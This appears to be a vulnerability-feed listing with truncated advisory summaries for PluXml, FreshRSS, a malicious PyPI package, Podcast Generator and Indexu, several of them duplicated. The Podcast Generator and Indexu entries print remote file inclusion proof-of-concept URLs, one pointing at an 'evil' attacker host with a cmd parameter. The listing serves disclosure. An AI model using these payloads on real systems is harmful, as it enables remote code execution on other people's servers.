CVE-2025-57567
A remote code execution (RCE) vulnerability exists in the PluXml CMS theme editor, specifically in the minify.php file located under the default theme directory /themes/defaut/css/minify.php. An authenticated administrator user can overwrite this file with arbitrary PHP code via the admin panel,...
EUVD-2025-31663
Malicious code in bioql PyPI...
CVE-2025-61586 FreshRSS is vulnerable to directory enumeration by setting path in its theme field
FreshRSS is a free, self-hostable RSS aggregator. Versions 1.26.3 and below are vulnerable to directory enumeration by setting path in theme field, allowing attackers to gain additional information about the server by checking if certain directories exist. This issue is fixed in version 1.27.0...
CVE-2025-61586
CVE-2025-61586 affects FreshRSS. Versions 1.26.3 and earlier are vulnerable to directory enumeration by manipulating the theme field path, allowing an attacker to determine existence of directories on the server and gain additional information. The issue is fixed in 1.27.0. There are multiple co...
CVE-2025-61586 FreshRSS is vulnerable to directory enumeration by setting path in its theme field
FreshRSS is a free, self-hostable RSS aggregator. Versions 1.26.3 and below are vulnerable to directory enumeration by setting path in theme field, allowing attackers to gain additional information about the server by checking if certain directories exist. This issue is fixed in version 1.27.0...
PT-2025-39919
Name of the Vulnerable Software and Affected Versions: FreshRSS versions 1.26.3 and below. Description: FreshRSS is susceptible to directory enumeration. By manipulating the theme field with a specific path, an attacker can determine the existence of directories on the server, potentially gaining...
podcast generator <= 1.2 globals[] Multiple Vulnerabilities
No description provided by source. Podcast Generator <= 1.2 GLOBALS Multiple Remote Vulnerabilities, by staker - stakerathotmaildotit / http://zeroidentity.org. Remote/Local Arbitrary File...
podcast-rfidisclose.txt
Podcast Generator = 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities http://sourceforge.net/project/showfiles.php?groupid=163847 POC : I- Remote File Inclusion Vulnerabilities /podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell...
Indexu-5.0.1.txt
Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable: INDEXU <= 5.0.1 (theme_path) and (base_path) Remote File Inclusion Exploit Discovery by SnIpErSA in themepath this file : exploit: http://example.com/indexu/index.php?themepath=http://evil.txt?cmd...
INDEXU <= 5.0.1 (theme_path) and (base_path) Remote File Inclusion Exploit
Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable: INDEXU <= 5.0.1 (theme_path) and (base_path) Remote File Inclusion Exploit Discovery by SnIpErSA in themepath this file : exploit: http://example.com/indexu/index.php?themepath=http://evil.txt?cmd...